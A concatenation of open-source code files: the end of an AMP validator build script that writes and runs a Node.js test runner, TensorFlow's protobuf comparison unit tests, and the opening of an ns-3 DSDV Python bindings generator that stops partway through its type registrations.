process.env.TESTDATA_ROOTS = 'testdata:%s'
require('./validator_test_minified');
require('./validator-light_test_minified');
require('./htmlparser_test_minified');
require('./parse-css_test_minified');
require('./parse-url_test_minified');
require('./amp4ads-parse-css_test_minified');
require('./parse-srcset_test_minified');
jasmine.onComplete(function (passed) {
process.exit(passed ? 0 : 1);
});
jasmine.execute();
""" % extensions_dir)
os.chmod('%s/test_runner' % out_dir, 0750)
logging.info('... success')
def RunTests(out_dir, nodejs_cmd):
"""Runs all the minified tests.
Args:
out_dir: directory name of the output directory. Must not have slashes,
dots, etc.
nodejs_cmd: the command for calling Node.js
"""
logging.info('entering ...')
subprocess.check_call([nodejs_cmd, '%s/test_runner' % out_dir])
logging.info('... success')
def Main():
"""The main method, which executes all build steps and runs the tests."""
logging.basicConfig(
format='[[%(filename)s %(funcName)s]] - %(message)s', level=logging.INFO)
nodejs_cmd = GetNodeJsCmd()
CheckPrereqs()
InstallNodeDependencies()
SetupOutDir(out_dir='dist')
GenValidatorProtoascii(out_dir='dist')
GenValidatorPb2Py(out_dir='dist')
GenValidatorProtoascii(out_dir='dist')
GenValidatorGeneratedJs(out_dir='dist')
GenValidatorGeneratedMd(out_dir='dist')
CompileValidatorMinified(out_dir='dist')
RunSmokeTest(out_dir='dist', nodejs_cmd=nodejs_cmd)
RunIndexTest(nodejs_cmd=nodejs_cmd)
CompileValidatorTestMinified(out_dir='dist')
CompileValidatorLightTestMinified(out_dir='dist')
CompileHtmlparserTestMinified(out_dir='dist')
CompileParseCssTestMinified(out_dir='dist')
CompileParseUrlTestMinified(out_dir='dist')
CompileAmp4AdsParseCssTestMinified(out_dir='dist')
CompileParseSrcsetTestMinified(out_dir='dist')
GenerateTestRunner(out_dir='dist')
RunTests(out_dir='dist', nodejs_cmd=nodejs_cmd)
if __name__ == '__main__':
Main()
| apache-2.0 |
hehongliang/tensorflow | tensorflow/python/util/protobuf/compare_test.py | 165 | 19171 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for python.util.protobuf.compare."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
import re
import textwrap
import six
from google.protobuf import text_format
from tensorflow.python.platform import googletest
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.protobuf import compare_test_pb2
def LargePbs(*args):
"""Converts ASCII string Large PBs to messages."""
pbs = []
for arg in args:
pb = compare_test_pb2.Large()
text_format.Merge(arg, pb)
pbs.append(pb)
return pbs
class ProtoEqTest(googletest.TestCase):
def assertNotEquals(self, a, b):
"""Asserts that ProtoEq says a != b."""
a, b = LargePbs(a, b)
googletest.TestCase.assertEquals(self, compare.ProtoEq(a, b), False)
def assertEquals(self, a, b):
"""Asserts that ProtoEq says a == b."""
a, b = LargePbs(a, b)
googletest.TestCase.assertEquals(self, compare.ProtoEq(a, b), True)
def testPrimitives(self):
googletest.TestCase.assertEqual(self, True, compare.ProtoEq('a', 'a'))
googletest.TestCase.assertEqual(self, False, compare.ProtoEq('b', 'a'))
def testEmpty(self):
self.assertEquals('', '')
def testPrimitiveFields(self):
self.assertNotEquals('string_: "a"', '')
self.assertEquals('string_: "a"', 'string_: "a"')
self.assertNotEquals('string_: "b"', 'string_: "a"')
self.assertNotEquals('string_: "ab"', 'string_: "aa"')
self.assertNotEquals('int64_: 0', '')
self.assertEquals('int64_: 0', 'int64_: 0')
self.assertNotEquals('int64_: -1', '')
self.assertNotEquals('int64_: 1', 'int64_: 0')
self.assertNotEquals('int64_: 0', 'int64_: -1')
self.assertNotEquals('float_: 0.0', '')
self.assertEquals('float_: 0.0', 'float_: 0.0')
self.assertNotEquals('float_: -0.1', '')
self.assertNotEquals('float_: 3.14', 'float_: 0')
self.assertNotEquals('float_: 0', 'float_: -0.1')
self.assertEquals('float_: -0.1', 'float_: -0.1')
self.assertNotEquals('bool_: true', '')
self.assertNotEquals('bool_: false', '')
self.assertNotEquals('bool_: true', 'bool_: false')
self.assertEquals('bool_: false', 'bool_: false')
self.assertEquals('bool_: true', 'bool_: true')
self.assertNotEquals('enum_: A', '')
self.assertNotEquals('enum_: B', 'enum_: A')
self.assertNotEquals('enum_: C', 'enum_: B')
self.assertEquals('enum_: C', 'enum_: C')
def testRepeatedPrimitives(self):
self.assertNotEquals('int64s: 0', '')
self.assertEquals('int64s: 0', 'int64s: 0')
self.assertNotEquals('int64s: 1', 'int64s: 0')
self.assertNotEquals('int64s: 0 int64s: 0', '')
self.assertNotEquals('int64s: 0 int64s: 0', 'int64s: 0')
self.assertNotEquals('int64s: 1 int64s: 0', 'int64s: 0')
self.assertNotEquals('int64s: 0 int64s: 1', 'int64s: 0')
self.assertNotEquals('int64s: 1', 'int64s: 0 int64s: 2')
self.assertNotEquals('int64s: 2 int64s: 0', 'int64s: 1')
self.assertEquals('int64s: 0 int64s: 0', 'int64s: 0 int64s: 0')
self.assertEquals('int64s: 0 int64s: 1', 'int64s: 0 int64s: 1')
self.assertNotEquals('int64s: 1 int64s: 0', 'int64s: 0 int64s: 0')
self.assertNotEquals('int64s: 1 int64s: 0', 'int64s: 0 int64s: 1')
self.assertNotEquals('int64s: 1 int64s: 0', 'int64s: 0 int64s: 2')
self.assertNotEquals('int64s: 1 int64s: 1', 'int64s: 1 int64s: 0')
self.assertNotEquals('int64s: 1 int64s: 1', 'int64s: 1 int64s: 0 int64s: 2')
def testMessage(self):
self.assertNotEquals('small <>', '')
self.assertEquals('small <>', 'small <>')
self.assertNotEquals('small < strings: "a" >', '')
self.assertNotEquals('small < strings: "a" >', 'small <>')
self.assertEquals('small < strings: "a" >', 'small < strings: "a" >')
self.assertNotEquals('small < strings: "b" >', 'small < strings: "a" >')
self.assertNotEquals('small < strings: "a" strings: "b" >',
'small < strings: "a" >')
self.assertNotEquals('string_: "a"', 'small <>')
self.assertNotEquals('string_: "a"', 'small < strings: "b" >')
self.assertNotEquals('string_: "a"', 'small < strings: "b" strings: "c" >')
self.assertNotEquals('string_: "a" small <>', 'small <>')
self.assertNotEquals('string_: "a" small <>', 'small < strings: "b" >')
self.assertEquals('string_: "a" small <>', 'string_: "a" small <>')
self.assertNotEquals('string_: "a" small < strings: "a" >',
'string_: "a" small <>')
self.assertEquals('string_: "a" small < strings: "a" >',
'string_: "a" small < strings: "a" >')
self.assertNotEquals('string_: "a" small < strings: "a" >',
'int64_: 1 small < strings: "a" >')
self.assertNotEquals('string_: "a" small < strings: "a" >', 'int64_: 1')
self.assertNotEquals('string_: "a"', 'int64_: 1 small < strings: "a" >')
self.assertNotEquals('string_: "a" int64_: 0 small < strings: "a" >',
'int64_: 1 small < strings: "a" >')
self.assertNotEquals('string_: "a" int64_: 1 small < strings: "a" >',
'string_: "a" int64_: 0 small < strings: "a" >')
self.assertEquals('string_: "a" int64_: 0 small < strings: "a" >',
'string_: "a" int64_: 0 small < strings: "a" >')
def testNestedMessage(self):
self.assertNotEquals('medium <>', '')
self.assertEquals('medium <>', 'medium <>')
self.assertNotEquals('medium < smalls <> >', 'medium <>')
self.assertEquals('medium < smalls <> >', 'medium < smalls <> >')
self.assertNotEquals('medium < smalls <> smalls <> >',
'medium < smalls <> >')
self.assertEquals('medium < smalls <> smalls <> >',
'medium < smalls <> smalls <> >')
self.assertNotEquals('medium < int32s: 0 >', 'medium < smalls <> >')
self.assertNotEquals('medium < smalls < strings: "a"> >',
'medium < smalls <> >')
def testTagOrder(self):
"""Tests that different fields are ordered by tag number.
For reference, here are the relevant tag numbers from compare_test.proto:
optional string string_ = 1;
optional int64 int64_ = 2;
optional float float_ = 3;
optional Small small = 8;
optional Medium medium = 7;
optional Small small = 8;
"""
self.assertNotEquals('string_: "a" ',
' int64_: 1 ')
self.assertNotEquals('string_: "a" int64_: 2 ',
' int64_: 1 ')
self.assertNotEquals('string_: "b" int64_: 1 ',
'string_: "a" int64_: 2 ')
self.assertEquals('string_: "a" int64_: 1 ',
'string_: "a" int64_: 1 ')
self.assertNotEquals('string_: "a" int64_: 1 float_: 0.0',
'string_: "a" int64_: 1 ')
self.assertEquals('string_: "a" int64_: 1 float_: 0.0',
'string_: "a" int64_: 1 float_: 0.0')
self.assertNotEquals('string_: "a" int64_: 1 float_: 0.1',
'string_: "a" int64_: 1 float_: 0.0')
self.assertNotEquals('string_: "a" int64_: 2 float_: 0.0',
'string_: "a" int64_: 1 float_: 0.1')
self.assertNotEquals('string_: "a" ',
' int64_: 1 float_: 0.1')
self.assertNotEquals('string_: "a" float_: 0.0',
' int64_: 1 ')
self.assertNotEquals('string_: "b" float_: 0.0',
'string_: "a" int64_: 1 ')
self.assertNotEquals('string_: "a"', 'small < strings: "a" >')
self.assertNotEquals('string_: "a" small < strings: "a" >',
'small < strings: "b" >')
self.assertNotEquals('string_: "a" small < strings: "b" >',
'string_: "a" small < strings: "a" >')
self.assertEquals('string_: "a" small < strings: "a" >',
'string_: "a" small < strings: "a" >')
self.assertNotEquals('string_: "a" medium <>',
'string_: "a" small < strings: "a" >')
self.assertNotEquals('string_: "a" medium < smalls <> >',
'string_: "a" small < strings: "a" >')
self.assertNotEquals('medium <>', 'small < strings: "a" >')
self.assertNotEquals('medium <> small <>', 'small < strings: "a" >')
self.assertNotEquals('medium < smalls <> >', 'small < strings: "a" >')
self.assertNotEquals('medium < smalls < strings: "a" > >',
'small < strings: "b" >')
class NormalizeNumbersTest(googletest.TestCase):
"""Tests for NormalizeNumberFields()."""
def testNormalizesInts(self):
pb = compare_test_pb2.Large()
pb.int64_ = 4
compare.NormalizeNumberFields(pb)
self.assertTrue(isinstance(pb.int64_, six.integer_types))
pb.int64_ = 4
compare.NormalizeNumberFields(pb)
self.assertTrue(isinstance(pb.int64_, six.integer_types))
pb.int64_ = 9999999999999999
compare.NormalizeNumberFields(pb)
self.assertTrue(isinstance(pb.int64_, six.integer_types))
def testNormalizesRepeatedInts(self):
pb = compare_test_pb2.Large()
pb.int64s.extend([1, 400, 999999999999999])
compare.NormalizeNumberFields(pb)
self.assertTrue(isinstance(pb.int64s[0], six.integer_types))
self.assertTrue(isinstance(pb.int64s[1], six.integer_types))
self.assertTrue(isinstance(pb.int64s[2], six.integer_types))
def testNormalizesFloats(self):
pb1 = compare_test_pb2.Large()
pb1.float_ = 1.2314352351231
pb2 = compare_test_pb2.Large()
pb2.float_ = 1.231435
self.assertNotEqual(pb1.float_, pb2.float_)
compare.NormalizeNumberFields(pb1)
compare.NormalizeNumberFields(pb2)
self.assertEqual(pb1.float_, pb2.float_)
def testNormalizesRepeatedFloats(self):
pb = compare_test_pb2.Large()
pb.medium.floats.extend([0.111111111, 0.111111])
compare.NormalizeNumberFields(pb)
for value in pb.medium.floats:
self.assertAlmostEqual(0.111111, value)
def testNormalizesDoubles(self):
pb1 = compare_test_pb2.Large()
pb1.double_ = 1.2314352351231
pb2 = compare_test_pb2.Large()
pb2.double_ = 1.2314352
self.assertNotEqual(pb1.double_, pb2.double_)
compare.NormalizeNumberFields(pb1)
compare.NormalizeNumberFields(pb2)
self.assertEqual(pb1.double_, pb2.double_)
def testNormalizesMaps(self):
pb = compare_test_pb2.WithMap()
pb.value_message[4].strings.extend(['a', 'b', 'c'])
pb.value_string['d'] = 'e'
compare.NormalizeNumberFields(pb)
class AssertTest(googletest.TestCase):
"""Tests assertProtoEqual()."""
def assertProtoEqual(self, a, b, **kwargs):
if isinstance(a, six.string_types) and isinstance(b, six.string_types):
a, b = LargePbs(a, b)
compare.assertProtoEqual(self, a, b, **kwargs)
def assertAll(self, a, **kwargs):
"""Checks that all possible asserts pass."""
self.assertProtoEqual(a, a, **kwargs)
def assertSameNotEqual(self, a, b):
"""Checks that assertProtoEqual() fails."""
self.assertRaises(AssertionError, self.assertProtoEqual, a, b)
def assertNone(self, a, b, message, **kwargs):
"""Checks that all possible asserts fail with the given message."""
message = re.escape(textwrap.dedent(message))
self.assertRaisesRegexp(AssertionError, message, self.assertProtoEqual, a,
b, **kwargs)
def testCheckInitialized(self):
# neither is initialized
a = compare_test_pb2.Labeled()
a.optional = 1
self.assertNone(a, a, 'Initialization errors: ', check_initialized=True)
self.assertAll(a, check_initialized=False)
# a is initialized, b isn't
b = copy.deepcopy(a)
a.required = 2
self.assertNone(a, b, 'Initialization errors: ', check_initialized=True)
self.assertNone(
a,
b,
"""
- required: 2
optional: 1
""",
check_initialized=False)
# both are initialized
a = compare_test_pb2.Labeled()
a.required = 2
self.assertAll(a, check_initialized=True)
self.assertAll(a, check_initialized=False)
b = copy.deepcopy(a)
b.required = 3
message = """
- required: 2
? ^
+ required: 3
? ^
"""
self.assertNone(a, b, message, check_initialized=True)
self.assertNone(a, b, message, check_initialized=False)
def testAssertEqualWithStringArg(self):
pb = compare_test_pb2.Large()
pb.string_ = 'abc'
pb.float_ = 1.234
compare.assertProtoEqual(self, """
string_: 'abc'
float_: 1.234
""", pb)
def testNormalizesNumbers(self):
pb1 = compare_test_pb2.Large()
pb1.int64_ = 4
pb2 = compare_test_pb2.Large()
pb2.int64_ = 4
compare.assertProtoEqual(self, pb1, pb2)
def testNormalizesFloat(self):
pb1 = compare_test_pb2.Large()
pb1.double_ = 4.0
pb2 = compare_test_pb2.Large()
pb2.double_ = 4
compare.assertProtoEqual(self, pb1, pb2, normalize_numbers=True)
def testPrimitives(self):
self.assertAll('string_: "x"')
self.assertNone('string_: "x"', 'string_: "y"', """
- string_: "x"
? ^
+ string_: "y"
? ^
""")
def testRepeatedPrimitives(self):
self.assertAll('int64s: 0 int64s: 1')
self.assertSameNotEqual('int64s: 0 int64s: 1', 'int64s: 1 int64s: 0')
self.assertSameNotEqual('int64s: 0 int64s: 1 int64s: 2',
'int64s: 2 int64s: 1 int64s: 0')
self.assertSameNotEqual('int64s: 0', 'int64s: 0 int64s: 0')
self.assertSameNotEqual('int64s: 0 int64s: 1',
'int64s: 1 int64s: 0 int64s: 1')
self.assertNone('int64s: 0', 'int64s: 0 int64s: 2', """
int64s: 0
+ int64s: 2
""")
self.assertNone('int64s: 0 int64s: 1', 'int64s: 0 int64s: 2', """
int64s: 0
- int64s: 1
? ^
+ int64s: 2
? ^
""")
def testMessage(self):
self.assertAll('medium: {}')
self.assertAll('medium: { smalls: {} }')
self.assertAll('medium: { int32s: 1 smalls: {} }')
self.assertAll('medium: { smalls: { strings: "x" } }')
self.assertAll(
'medium: { smalls: { strings: "x" } } small: { strings: "y" }')
self.assertSameNotEqual('medium: { smalls: { strings: "x" strings: "y" } }',
'medium: { smalls: { strings: "y" strings: "x" } }')
self.assertSameNotEqual(
'medium: { smalls: { strings: "x" } smalls: { strings: "y" } }',
'medium: { smalls: { strings: "y" } smalls: { strings: "x" } }')
self.assertSameNotEqual(
'medium: { smalls: { strings: "x" strings: "y" strings: "x" } }',
'medium: { smalls: { strings: "y" strings: "x" } }')
self.assertSameNotEqual(
'medium: { smalls: { strings: "x" } int32s: 0 }',
'medium: { int32s: 0 smalls: { strings: "x" } int32s: 0 }')
self.assertNone('medium: {}', 'medium: { smalls: { strings: "x" } }', """
medium {
+ smalls {
+ strings: "x"
+ }
}
""")
self.assertNone('medium: { smalls: { strings: "x" } }',
'medium: { smalls: {} }', """
medium {
smalls {
- strings: "x"
}
}
""")
self.assertNone('medium: { int32s: 0 }', 'medium: { int32s: 1 }', """
medium {
- int32s: 0
? ^
+ int32s: 1
? ^
}
""")
def testMsgPassdown(self):
self.assertRaisesRegexp(
AssertionError,
'test message passed down',
self.assertProtoEqual,
'medium: {}',
'medium: { smalls: { strings: "x" } }',
msg='test message passed down')
def testRepeatedMessage(self):
self.assertAll('medium: { smalls: {} smalls: {} }')
self.assertAll('medium: { smalls: { strings: "x" } } medium: {}')
self.assertAll('medium: { smalls: { strings: "x" } } medium: { int32s: 0 }')
self.assertAll('medium: { smalls: {} smalls: { strings: "x" } } small: {}')
self.assertSameNotEqual('medium: { smalls: { strings: "x" } smalls: {} }',
'medium: { smalls: {} smalls: { strings: "x" } }')
self.assertSameNotEqual('medium: { smalls: {} }',
'medium: { smalls: {} smalls: {} }')
self.assertSameNotEqual('medium: { smalls: {} smalls: {} } medium: {}',
'medium: {} medium: {} medium: { smalls: {} }')
self.assertSameNotEqual(
'medium: { smalls: { strings: "x" } smalls: {} }',
'medium: { smalls: {} smalls: { strings: "x" } smalls: {} }')
self.assertNone('medium: {}', 'medium: {} medium { smalls: {} }', """
medium {
+ smalls {
+ }
}
""")
self.assertNone('medium: { smalls: {} smalls: { strings: "x" } }',
'medium: { smalls: {} smalls: { strings: "y" } }', """
medium {
smalls {
}
smalls {
- strings: "x"
? ^
+ strings: "y"
? ^
}
}
""")
class MixinTests(compare.ProtoAssertions, googletest.TestCase):
def testAssertEqualWithStringArg(self):
pb = compare_test_pb2.Large()
pb.string_ = 'abc'
pb.float_ = 1.234
self.assertProtoEqual("""
string_: 'abc'
float_: 1.234
""", pb)
if __name__ == '__main__':
googletest.main()
| apache-2.0 |
rabimba/ns-3.18 | src/dsdv/bindings/modulegen__gcc_ILP32.py | 24 | 465540 | from pybindgen import Module, FileCodeSink, param, retval, cppclass, typehandlers
import pybindgen.settings
import warnings
class ErrorHandler(pybindgen.settings.ErrorHandler):
def handle_error(self, wrapper, exception, traceback_):
warnings.warn("exception %r in wrapper %s" % (exception, wrapper))
return True
pybindgen.settings.error_handler = ErrorHandler()
import sys
def module_init():
root_module = Module('ns.dsdv', cpp_namespace='::ns3')
return root_module
def register_types(module):
root_module = module.get_root()
## address.h (module 'network'): ns3::Address [class]
module.add_class('Address', import_from_module='ns.network')
## address.h (module 'network'): ns3::Address::MaxSize_e [enumeration]
module.add_enum('MaxSize_e', ['MAX_SIZE'], outer_class=root_module['ns3::Address'], import_from_module='ns.network')
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList [class]
module.add_class('AttributeConstructionList', import_from_module='ns.core')
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item [struct]
module.add_class('Item', import_from_module='ns.core', outer_class=root_module['ns3::AttributeConstructionList'])
## buffer.h (module 'network'): ns3::Buffer [class]
module.add_class('Buffer', import_from_module='ns.network')
## buffer.h (module 'network'): ns3::Buffer::Iterator [class]
module.add_class('Iterator', import_from_module='ns.network', outer_class=root_module['ns3::Buffer'])
## packet.h (module 'network'): ns3::ByteTagIterator [class]
module.add_class('ByteTagIterator', import_from_module='ns.network')
## packet.h (module 'network'): ns3::ByteTagIterator::Item [class]
module.add_class('Item', import_from_module='ns.network', outer_class=root_module['ns3::ByteTagIterator'])
## byte-tag-list.h (module 'network'): ns3::ByteTagList [class]
module.add_class('ByteTagList', import_from_module='ns.network')
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator [class]
module.add_class('Iterator', import_from_module='ns.network', outer_class=root_module['ns3::ByteTagList'])
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item [struct]
module.add_class('Item', import_from_module='ns.network', outer_class=root_module['ns3::ByteTagList::Iterator'])
## callback.h (module 'core'): ns3::CallbackBase [class]
module.add_class('CallbackBase', import_from_module='ns.core')
## event-id.h (module 'core'): ns3::EventId [class]
module.add_class('EventId', import_from_module='ns.core')
## hash.h (module 'core'): ns3::Hasher [class]
module.add_class('Hasher', import_from_module='ns.core')
## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress [class]
module.add_class('Inet6SocketAddress', import_from_module='ns.network')
## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress [class]
root_module['ns3::Inet6SocketAddress'].implicitly_converts_to(root_module['ns3::Address'])
## inet-socket-address.h (module 'network'): ns3::InetSocketAddress [class]
module.add_class('InetSocketAddress', import_from_module='ns.network')
## inet-socket-address.h (module 'network'): ns3::InetSocketAddress [class]
root_module['ns3::InetSocketAddress'].implicitly_converts_to(root_module['ns3::Address'])
## int-to-type.h (module 'core'): ns3::IntToType<0> [struct]
module.add_class('IntToType', import_from_module='ns.core', template_parameters=['0'])
## int-to-type.h (module 'core'): ns3::IntToType<0>::v_e [enumeration]
module.add_enum('v_e', ['value'], outer_class=root_module['ns3::IntToType< 0 >'], import_from_module='ns.core')
## int-to-type.h (module 'core'): ns3::IntToType<1> [struct]
module.add_class('IntToType', import_from_module='ns.core', template_parameters=['1'])
## int-to-type.h (module 'core'): ns3::IntToType<1>::v_e [enumeration]
module.add_enum('v_e', ['value'], outer_class=root_module['ns3::IntToType< 1 >'], import_from_module='ns.core')
## int-to-type.h (module 'core'): ns3::IntToType<2> [struct]
module.add_class('IntToType', import_from_module='ns.core', template_parameters=['2'])
## int-to-type.h (module 'core'): ns3::IntToType<2>::v_e [enumeration]
module.add_enum('v_e', ['value'], outer_class=root_module['ns3::IntToType< 2 >'], import_from_module='ns.core')
## int-to-type.h (module 'core'): ns3::IntToType<3> [struct]
module.add_class('IntToType', import_from_module='ns.core', template_parameters=['3'])
## int-to-type.h (module 'core'): ns3::IntToType<3>::v_e [enumeration]
module.add_enum('v_e', ['value'], outer_class=root_module['ns3::IntToType< 3 >'], import_from_module='ns.core')
## int-to-type.h (module 'core'): ns3::IntToType<4> [struct]
module.add_class('IntToType', import_from_module='ns.core', template_parameters=['4'])
## int-to-type.h (module 'core'): ns3::IntToType<4>::v_e [enumeration]
module.add_enum('v_e', ['value'], outer_class=root_module['ns3::IntToType< 4 >'], import_from_module='ns.core')
## int-to-type.h (module 'core'): ns3::IntToType<5> [struct]
module.add_class('IntToType', import_from_module='ns.core', template_parameters=['5'])
## int-to-type.h (module 'core'): ns3::IntToType<5>::v_e [enumeration]
module.add_enum('v_e', ['value'], outer_class=root_module['ns3::IntToType< 5 >'], import_from_module='ns.core')
## int-to-type.h (module 'core'): ns3::IntToType<6> [struct]
module.add_class('IntToType', import_from_module='ns.core', template_parameters=['6'])
## int-to-type.h (module 'core'): ns3::IntToType<6>::v_e [enumeration]
module.add_enum('v_e', ['value'], outer_class=root_module['ns3::IntToType< 6 >'], import_from_module='ns.core')
## ipv4-address.h (module 'network'): ns3::Ipv4Address [class]
module.add_class('Ipv4Address', import_from_module='ns.network')
## ipv4-address.h (module 'network'): ns3::Ipv4Address [class]
root_module['ns3::Ipv4Address'].implicitly_converts_to(root_module['ns3::Address'])
## ipv4-interface-address.h (module 'internet'): ns3::Ipv4InterfaceAddress [class]
module.add_class('Ipv4InterfaceAddress', import_from_module='ns.internet')
## ipv4-interface-address.h (module 'internet'): ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e [enumeration]
module.add_enum('InterfaceAddressScope_e', ['HOST', 'LINK', 'GLOBAL'], outer_class=root_module['ns3::Ipv4InterfaceAddress'], import_from_module='ns.internet')
## ipv4-address.h (module 'network'): ns3::Ipv4Mask [class]
module.add_class('Ipv4Mask', import_from_module='ns.network')
## ipv4-routing-helper.h (module 'internet'): ns3::Ipv4RoutingHelper [class]
module.add_class('Ipv4RoutingHelper', allow_subclassing=True, import_from_module='ns.internet')
## ipv6-address.h (module 'network'): ns3::Ipv6Address [class]
module.add_class('Ipv6Address', import_from_module='ns.network')
## ipv6-address.h (module 'network'): ns3::Ipv6Address [class]
root_module['ns3::Ipv6Address'].implicitly_converts_to(root_module['ns3::Address'])
## ipv6-interface-address.h (module 'internet'): ns3::Ipv6InterfaceAddress [class]
module.add_class('Ipv6InterfaceAddress', import_from_module='ns.internet')
## ipv6-interface-address.h (module 'internet'): ns3::Ipv6InterfaceAddress::State_e [enumeration]
module.add_enum('State_e', ['TENTATIVE', 'DEPRECATED', 'PREFERRED', 'PERMANENT', 'HOMEADDRESS', 'TENTATIVE_OPTIMISTIC', 'INVALID'], outer_class=root_module['ns3::Ipv6InterfaceAddress'], import_from_module='ns.internet')
## ipv6-interface-address.h (module 'internet'): ns3::Ipv6InterfaceAddress::Scope_e [enumeration]
module.add_enum('Scope_e', ['HOST', 'LINKLOCAL', 'GLOBAL'], outer_class=root_module['ns3::Ipv6InterfaceAddress'], import_from_module='ns.internet')
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix [class]
module.add_class('Ipv6Prefix', import_from_module='ns.network')
## node-container.h (module 'network'): ns3::NodeContainer [class]
module.add_class('NodeContainer', import_from_module='ns.network')
## object-base.h (module 'core'): ns3::ObjectBase [class]
module.add_class('ObjectBase', allow_subclassing=True, import_from_module='ns.core')
## object.h (module 'core'): ns3::ObjectDeleter [struct]
module.add_class('ObjectDeleter', import_from_module='ns.core')
## object-factory.h (module 'core'): ns3::ObjectFactory [class]
module.add_class('ObjectFactory', import_from_module='ns.core')
## packet-metadata.h (module 'network'): ns3::PacketMetadata [class]
module.add_class('PacketMetadata', import_from_module='ns.network')
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item [struct]
module.add_class('Item', import_from_module='ns.network', outer_class=root_module['ns3::PacketMetadata'])
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item [enumeration]
module.add_enum('', ['PAYLOAD', 'HEADER', 'TRAILER'], outer_class=root_module['ns3::PacketMetadata::Item'], import_from_module='ns.network')
## packet-metadata.h (module 'network'): ns3::PacketMetadata::ItemIterator [class]
module.add_class('ItemIterator', import_from_module='ns.network', outer_class=root_module['ns3::PacketMetadata'])
## packet.h (module 'network'): ns3::PacketTagIterator [class]
module.add_class('PacketTagIterator', import_from_module='ns.network')
## packet.h (module 'network'): ns3::PacketTagIterator::Item [class]
module.add_class('Item', import_from_module='ns.network', outer_class=root_module['ns3::PacketTagIterator'])
## packet-tag-list.h (module 'network'): ns3::PacketTagList [class]
module.add_class('PacketTagList', import_from_module='ns.network')
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData [struct]
module.add_class('TagData', import_from_module='ns.network', outer_class=root_module['ns3::PacketTagList'])
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::TagData_e [enumeration]
module.add_enum('TagData_e', ['MAX_SIZE'], outer_class=root_module['ns3::PacketTagList::TagData'], import_from_module='ns.network')
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter> [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Object', 'ns3::ObjectBase', 'ns3::ObjectDeleter'], parent=root_module['ns3::ObjectBase'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simulator.h (module 'core'): ns3::Simulator [class]
module.add_class('Simulator', destructor_visibility='private', import_from_module='ns.core')
## tag.h (module 'network'): ns3::Tag [class]
module.add_class('Tag', import_from_module='ns.network', parent=root_module['ns3::ObjectBase'])
## tag-buffer.h (module 'network'): ns3::TagBuffer [class]
module.add_class('TagBuffer', import_from_module='ns.network')
## timer.h (module 'core'): ns3::Timer [class]
module.add_class('Timer', import_from_module='ns.core')
## timer.h (module 'core'): ns3::Timer::DestroyPolicy [enumeration]
module.add_enum('DestroyPolicy', ['CANCEL_ON_DESTROY', 'REMOVE_ON_DESTROY', 'CHECK_ON_DESTROY'], outer_class=root_module['ns3::Timer'], import_from_module='ns.core')
## timer.h (module 'core'): ns3::Timer::State [enumeration]
module.add_enum('State', ['RUNNING', 'EXPIRED', 'SUSPENDED'], outer_class=root_module['ns3::Timer'], import_from_module='ns.core')
## timer-impl.h (module 'core'): ns3::TimerImpl [class]
module.add_class('TimerImpl', allow_subclassing=True, import_from_module='ns.core')
## type-id.h (module 'core'): ns3::TypeId [class]
module.add_class('TypeId', import_from_module='ns.core')
## type-id.h (module 'core'): ns3::TypeId::AttributeFlag [enumeration]
module.add_enum('AttributeFlag', ['ATTR_GET', 'ATTR_SET', 'ATTR_CONSTRUCT', 'ATTR_SGC'], outer_class=root_module['ns3::TypeId'], import_from_module='ns.core')
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation [struct]
module.add_class('AttributeInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId'])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation [struct]
module.add_class('TraceSourceInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId'])
## empty.h (module 'core'): ns3::empty [class]
module.add_class('empty', import_from_module='ns.core')
## int64x64-double.h (module 'core'): ns3::int64x64_t [class]
module.add_class('int64x64_t', import_from_module='ns.core')
## chunk.h (module 'network'): ns3::Chunk [class]
module.add_class('Chunk', import_from_module='ns.network', parent=root_module['ns3::ObjectBase'])
## dsdv-helper.h (module 'dsdv'): ns3::DsdvHelper [class]
module.add_class('DsdvHelper', parent=root_module['ns3::Ipv4RoutingHelper'])
## header.h (module 'network'): ns3::Header [class]
module.add_class('Header', import_from_module='ns.network', parent=root_module['ns3::Chunk'])
## ipv4-header.h (module 'internet'): ns3::Ipv4Header [class]
module.add_class('Ipv4Header', import_from_module='ns.internet', parent=root_module['ns3::Header'])
## ipv4-header.h (module 'internet'): ns3::Ipv4Header::DscpType [enumeration]
module.add_enum('DscpType', ['DscpDefault', 'DSCP_CS1', 'DSCP_AF11', 'DSCP_AF12', 'DSCP_AF13', 'DSCP_CS2', 'DSCP_AF21', 'DSCP_AF22', 'DSCP_AF23', 'DSCP_CS3', 'DSCP_AF31', 'DSCP_AF32', 'DSCP_AF33', 'DSCP_CS4', 'DSCP_AF41', 'DSCP_AF42', 'DSCP_AF43', 'DSCP_CS5', 'DSCP_EF', 'DSCP_CS6', 'DSCP_CS7'], outer_class=root_module['ns3::Ipv4Header'], import_from_module='ns.internet')
## ipv4-header.h (module 'internet'): ns3::Ipv4Header::EcnType [enumeration]
